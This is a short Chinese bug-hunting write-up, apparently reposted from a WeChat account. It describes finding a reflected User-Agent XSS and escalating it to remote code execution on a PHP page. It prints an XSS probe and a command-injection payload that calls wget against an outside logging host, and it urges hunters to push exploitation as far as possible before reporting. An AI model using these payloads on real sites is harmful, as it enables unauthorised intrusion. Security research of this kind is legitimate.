作为一名白帽子,我认为最重要的是我们要在最大限度内尝试利用漏洞,最终导致该漏洞产生更大的影响。发现漏洞时不要急于提交。
这次漏洞也很简单....不是水问题,在于你在看到的时候能否往这方面想。
0x00、信息搜集
跟上一篇一样,常规信息搜集,不过多叙述,重点放在危害提升。
0x01、XSS漏洞挖掘
浏览历史数据包发现网站会不定时发送一个数据包返回我的ip地址、浏览器、代理等。
首先想到的肯定是self-xss
于是我添加<script>alert(1)</script>作为User-Agent标头值以查看它是否会在返回包中出现
好消息是它成功了,坏消息是危害太小。
0x02、如何提升至RCE
我决定继续测试,在测试时我注意到他们网站上的其中一个页面的扩展名为.php,并且它也像所有其他页面一样以源代码返回我的信息。
所以我尝试了一下代码作为User-Agent标头值:
'wget http://dnslog.cn' ); system(
今天还是lucky dog哈哈
接下来更新的有基础也会有漏洞挖掘或是代码审计,如有问题欢迎后台私信,需要CNVD证书的大佬也可以私信。
喜欢的可以关注收藏、转发与身边的朋友分享,感谢。
原文始发于微信公众号(漏洞之星):如何从self-xss到RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论